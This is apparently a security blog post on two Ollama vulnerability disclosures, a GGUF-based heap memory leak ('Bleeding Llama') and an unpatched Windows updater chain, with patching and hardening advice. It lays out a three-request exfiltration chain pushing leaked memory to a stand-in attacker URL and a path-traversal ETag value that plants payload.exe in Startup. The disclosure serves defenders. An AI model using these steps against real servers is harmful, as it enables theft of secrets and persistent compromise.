Ollama RCE Vulnerability: Bleeding Llama & Windows Exploits

Two separate security disclosures have landed on the AI infrastructure community in quick succession, and neither is easy to brush off. Researchers have found multiple critical flaws in Ollama, the open source framework used by hundreds of thousands of developers and enterprises to run large language models on local hardware. One of them, dubbed “Bleeding Llama,” lets a complete stranger drain your server’s process memory in three HTTP calls. The other, a Windows-specific update chain attack, has been sitting unpatched for over 90 days.

If you’re running Ollama, the short version is: upgrade to v0.23.2 or later right now, and if you’re on Windows, manually disable auto-updates until the vendor ships a fix.

Ollama Logo

What Is Ollama and Why Does This Matter?

Ollama is a popular open source framework that lets users run LLMs locally rather than through cloud APIs. On GitHub, the project has over 171,000 stars and more than 16,100 forks. With over 100 million Docker Hub downloads and wide enterprise adoption as a self-hosted AI inference engine, it has become the de facto standard for teams that want model inference on their own hardware.

The problem is that Ollama does not provide authentication by default and is frequently configured to listen on all network interfaces (0.0.0.0), even though it’s designed for local use and binds to localhost by default. The documented OLLAMA_HOST=0.0.0.0 configuration is widely used in practice, with large public-internet exposure observed, according to NVD. The result: roughly 300,000 Ollama servers are currently exposed on the public internet, with many more sitting on local networks with little isolation.

CVE-2026-7482 – “Bleeding Llama”

Background: How Ollama Creates Models from Files

To understand the vulnerability, you first need to understand the code path it lives in.

Creating model instances in Ollama can be done two ways. The first is /api/pull, which downloads an existing model from the Ollama registry. The second is /api/create, which lets you build custom model instances by specifying configuration parameters like system prompts and quantization levels, either pulling from a remote registry or building from previously uploaded model files.

Files are uploaded to the Ollama server through the /api/blobs/sha256:[sha256-digest] endpoint. The SHA-256 digest is calculated from the file’s content, and the actual file content is sent in the HTTP body of the request.

What Is a GGUF File?

GGUF is a file format used to store large language models in a way that makes them efficient to load and run locally. A GGUF file contains tensors – multi-dimensional arrays of numbers representing the model’s learned parameters (weights). The header contains data describing the file: the version of the GGUF format, the number of tensors, and key-value metadata.

One metadata field worth noting is general.file_type, which determines how the numbers inside the tensors are stored. The two types relevant to this vulnerability are F16 (float-16) and F32 (float-32). After the header comes a list of tensor objects, each storing the tensor’s name, number of dimensions, data type, and an offset that points to where the actual tensor data lives in the file.

Quantization: What It Is and Why It Matters Here

Quantization reduces the precision of numbers stored in tensors, making the model smaller and faster to run at the cost of some accuracy. F32 stores each number in 4 bytes; F16 uses 2 bytes. Moving from F32 to F16 cuts memory usage in half but involves permanent data loss – some decimal precision is gone and can’t be recovered. Going the other direction, F16 to F32, involves no data loss at all. That last point is critical to how the exploit works.

The Unsafe Package: Go’s Security Escape Hatch

Go developers might wonder how an out-of-bounds memory vulnerability is even possible in a memory-safe language where the runtime would normally panic and crash. The answer is Go’s unsafe package which acts as an escape hatch for low-level memory operations where all the usual safety guarantees are bypassed. Unsurprisingly, the one place Ollama uses unsafe is exactly where this vulnerability lives.

The Bug in `WriteTo()`

When /api/create processes a GGUF file, createModel is called to orchestrate model creation. If quantization is requested, a new layer is prepared by copying each tensor’s metadata – shape and type but leaving the actual data out. Then, for each tensor, WriteTo() is called, the function responsible for the actual mathematical conversion from source type to destination type.

For optimization, WriteTo() first converts source data to F32, then from F32 to the destination format. By always going through F32 as a middle step, only two conversion functions are needed per format rather than a direct path between every possible pair. If the target type is already F32, the middle step simply copies the data directly.

Here is where it breaks. WriteTo() calls ConvertToF32 with three parameters: the original data buffer, the source type, and q.from.Elements(). The Elements() function returns the total number of elements in a tensor by multiplying its shape dimensions together – a tensor with shape (3, 3, 3) has 27 elements. ConvertToF32 then calls the appropriate conversion function based on the source type. If the source is F16, it calls ggml_fp16_to_fp32_row with a pointer to the original data, an output buffer, and the number of elements to read, which comes from Elements().

The problem: GGUF is just a binary format, and anyone can create one manually and set the tensor’s shape to any value. There is no validation that the number of elements about to be read actually matches the real size of the data. If an attacker sets a very large number in the shape field, the loop blindly reads past the end of the buffer, that’s the out-of-bounds heap read.

So an attacker crafts a GGUF file where the tensor header declares a shape of, say, 1,000 × 1,000 × 1,000 elements (one billion), while the actual file data behind it is only a few bytes. The loop in ggml_fp16_to_fp32_row runs for a billion iterations starting at the buffer boundary, pulling whatever heap memory lies beyond it, other users’ conversation data, system prompt strings, environment variable contents, all into the output buffer.

The Lossless Exfiltration Trick

This is where Cyera’s researchers found something genuinely inventive. Reading raw heap memory through most attack paths produces corrupted garbage, because lossy quantization destroys the byte patterns needed to reconstruct the original content.

To keep the leaked data intact, set the tensor type to F16 and request F32 as the target format. F16 to F32 is a lossless conversion – 2 bytes expand to 4 bytes with no information loss. Since the target is already F32, the second conversion stage does nothing at all. The data lands on disk exactly as it was in memory.

The result is a model artifact written to disk that contains the server’s heap memory, perfectly preserved and bit-for-bit readable.

Getting the Data Out: Abusing `/api/push`

At this point the stolen memory is sitting in a model file on the target server. The attacker still needs to retrieve it.

Ollama’s /api/push endpoint accepts a model name as a parameter and uploads the named model to a registry. The PushHandler function checks whether a model with that name exists on disk, then calls PushModel to handle the upload. PushModel parses the model name, and if the name looks like an HTTP URI, it pushes the entire model to that URI.

There is no validation preventing this. You can create a model via /api/create (with files) and give the model a name like http://attacker-server.com/namespace/model:tag, then call /api/push with that same name, and Ollama will upload the model – leaked heap data and all – straight to the attacker’s server.

The Full Three-Call Attack Chain

Put it all together and the attack is just this:

POST /api/blobs/sha256:[hash] – Upload the crafted GGUF file with a forged tensor shape of 1 million elements pointing to a few bytes of actual data.
POST /api/create – Trigger model creation with quantize=F32 and set the model name to a URI under attacker control (e.g., http://evil.example.com/org/stolen-model:latest). This fires WriteTo(), the out-of-bounds read happens, and the leaked heap memory lands in the new model artifact on disk.
POST /api/push – Push the resulting “model” to the attacker-controlled registry. Ollama faithfully uploads the artifact containing everything it just read from heap memory.

The leaked data in practice contains user prompts, system prompts from other models loaded concurrently, and environment variables from the host machine, all exposed with just three API calls.

No credentials. No privilege escalation. No exploit code in the traditional sense – just HTTP requests, a hand-crafted binary file, and a server running Ollama.

What Actually Gets Stolen

In enterprise environments, leaked heap contents may include API keys, internal instructions, proprietary code, customer-related content, and other sensitive material processed by AI workflows. The risk compounds when Ollama is connected to external tools or coding assistants, because those outputs pass through memory and become part of what an attacker can extract.

In a large enterprise using Ollama as a shared inference service for thousands of employees, an attacker can learn basically anything about the organization – API keys, proprietary code, customer contracts, and much more. Environment variables are particularly dangerous since they routinely carry cloud credentials like AWS_ACCESS_KEY_ID, GIT_TOKEN, or database connection strings.

CVE-2026-42248 and CVE-2026-42249 – The Windows Updater Chain

Still Unpatched

While Bleeding Llama has a fix available in v0.17.1, the Windows-specific attack chain from Striga and CERT Polska does not. The shortcomings remain unpatched following disclosure on January 27, 2026, and were published following the elapse of a 90-day disclosure period.

How the Update Mechanism Works

The Windows desktop client auto-starts on login from the Windows Startup folder, listens on 127.0.0.1:11434, and periodically polls for updates in the background via the /api/update endpoint, running any pending updates on the next app start.

Two separate weaknesses in this pipeline, individually rated CVSS 7.7, chain into something considerably worse.

CVE-2026-42248: Missing Signature Verification

On Windows, the verifyDownload() function is a stub. It unconditionally returns nil – success without performing any code signing check. There is no cryptographic verification that a downloaded binary is legitimately signed by Ollama’s build infrastructure. The updater will accept any arbitrary PE binary handed to it as a valid update package.

This means that if an attacker can influence what the updater receives, through any network path, they win without needing the path traversal bug. The missing integrity check alone is sufficient for code execution if the attacker controls the update response.

CVE-2026-42249: Path Traversal via Unsanitized ETag Headers

The updater constructs the local staging directory path for the installer using values taken directly from the ETag HTTP response header. ETag values are not sanitized before being used to build file paths. An attacker-controlled update server can supply an ETag like:

			
../../../../../../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

This redirects where the downloaded binary gets written, placing it directly into the Windows Startup folder.

Chaining for Persistent Execution

Combine the two. The attacker supplies a malicious PE binary as the “update payload” and a path-traversal ETag pointing to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\. With no signature check to fail, the file gets written silently to Startup. To exploit the flaws, the attacker needs to control an update server reachable by the victim’s Ollama client which is achievable by overriding OLLAMA_UPDATE_URL to point at a local server on plain HTTP, or through DNS hijacking or TLS interception on the network. The attack chain also requires AutoUpdateEnabled to be on, which is the default setting.

The update process runs silently in the background with no user notification. On next login, Windows executes the payload. The backdoor survives Ollama reinstalls because the malicious file lives in Startup independently of Ollama’s own installation directory.

Why Enterprise AI Is Particularly Exposed

The uncomfortable truth is that Ollama was never designed for how it’s actually deployed. Ollama was designed as a localhost tool, which is why it doesn’t include authentication. In practice, teams deploy it in containers, expose it to other services, or configure it to listen on all interfaces to support multi-client use.

Attackers with access to Ollama HTTP servers can already instruct them to pull or delete any AI model. The memory leak vulnerability takes that further, extracting secrets from the inference process itself.

The agentic pipeline angle is especially worth noting. Teams running Claude Code, LangChain, or custom orchestration layers routed through a local Ollama instance are pushing proprietary code, internal documentation, and API credentials through that server’s heap memory on every inference call.

Response Plan

Triage

Run ollama --version across every workstation and server. Anything below 0.17.1 is vulnerable to memory leaks. Check network binding with ss -tlnp | grep 11434, if Ollama is bound to 0.0.0.0, assume the worst. Run a Shodan query against your public IP ranges on port 11434.

Patch and Contain

Upgrade to v0.23.2 or the latest available release. Set the environment variable OLLAMA_HOST=127.0.0.1:11434 to prevent external network access. If remote access is genuinely required, put Ollama behind an authenticating reverse proxy (Nginx, Caddy) or an identity-aware gateway like Tailscale or Cloudflare Access.

If your Ollama instance was publicly accessible before the patch, assume potential compromise. Review what sensitive data may have been exposed and rotate all credentials. That means cloud provider keys, API tokens, registry credentials, and any secrets that could have lived in the environment of the host process.

Windows-Specific Hardening

Until Ollama ships fixes for CVE-2026-42248 and CVE-2026-42249:

Disable auto-updates in the Ollama tray settings. Remove any Startup entries:

powershell

			
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Ollama.lnk"

Do not re-enable auto-updates until signature verification is actually implemented. Monitor the official Ollama GitHub releases directly and update manually by downloading the installer from source.

Frequently Asked Questions

Q: My Ollama instance runs in Docker. Am I safe?

No. Docker isolation doesn’t protect against Bleeding Llama. The vulnerability leaks memory from within the Ollama process itself. If the container’s port 11434 is reachable from the network or from other containers on the same host – the attack works fine. Container boundaries are irrelevant here.

Q: Will my EDR catch this?

Probably not for the memory leak. The out-of-bounds read happens inside a completely legitimate code path of the Ollama process. No shellcode, no unusual syscalls nothing a typical behavioral EDR signature would flag. The Windows RCE payload might get caught when it executes on login, depending on what it does, but by then the persistence is already in place.

Q: Can I add authentication to Ollama itself?

No. Ollama provides no built-in authentication. It is the operator’s responsibility to provide an authentication layer using external tools like Nginx, Caddy, or enterprise identity providers.

The Bigger Picture

The “Bleeding Llama” incident isn’t just an Ollama problem. It’s a preview of what happens when infrastructure outpaces its own security model. Ollama succeeded at making local AI inference easy. But “easy for localhost use” and “safe for multi-user enterprise deployment” were never the same requirement, and the gap between them is where these vulnerabilities live.

The general advice from security researchers is – deploy an authentication proxy in front of all Ollama instances, never expose them to the internet without IP filters and firewalls, isolate local-network instances on secure segments. It applies to the entire AI framework ecosystem, which is increasingly targeted.

AI runtimes deserve the same network paranoia that legacy unauthenticated databases once demanded. The attack surface is real, the exposure numbers are large, and the data sitting in inference server memory is often exactly what an adversary would pay for.

Critical Ollama Vulnerabilities: “Bleeding Llama” and an Unpatched Windows RCE Are Hitting 300,000 Servers

What Is Ollama and Why Does This Matter?

CVE-2026-7482 – “Bleeding Llama”

Background: How Ollama Creates Models from Files

What Is a GGUF File?

Quantization: What It Is and Why It Matters Here

The Unsafe Package: Go’s Security Escape Hatch

The Bug in WriteTo()

The Lossless Exfiltration Trick

Getting the Data Out: Abusing /api/push

The Full Three-Call Attack Chain

What Actually Gets Stolen

CVE-2026-42248 and CVE-2026-42249 – The Windows Updater Chain

Still Unpatched

How the Update Mechanism Works

CVE-2026-42248: Missing Signature Verification

CVE-2026-42249: Path Traversal via Unsanitized ETag Headers

Chaining for Persistent Execution

Why Enterprise AI Is Particularly Exposed

Response Plan

Triage

Patch and Contain

Windows-Specific Hardening

Frequently Asked Questions

The Bigger Picture

Join the Conversation

The analysis doesn't stop here. Connect with our community of tech enthusiasts and security pros for daily discussions and Q&As

Buy me A Coffee!

Support The CyberSec Guru’s Mission

Why your support matters:

If you like this post, then please share it:

Discover more from The CyberSec Guru

Related Posts

Leave a ReplyCancel reply

most recent

Glossary

News

News

News

Exploits

Exploits

Newsletter Subscription

Discover more from The CyberSec Guru

The Bug in `WriteTo()`

Getting the Data Out: Abusing `/api/push`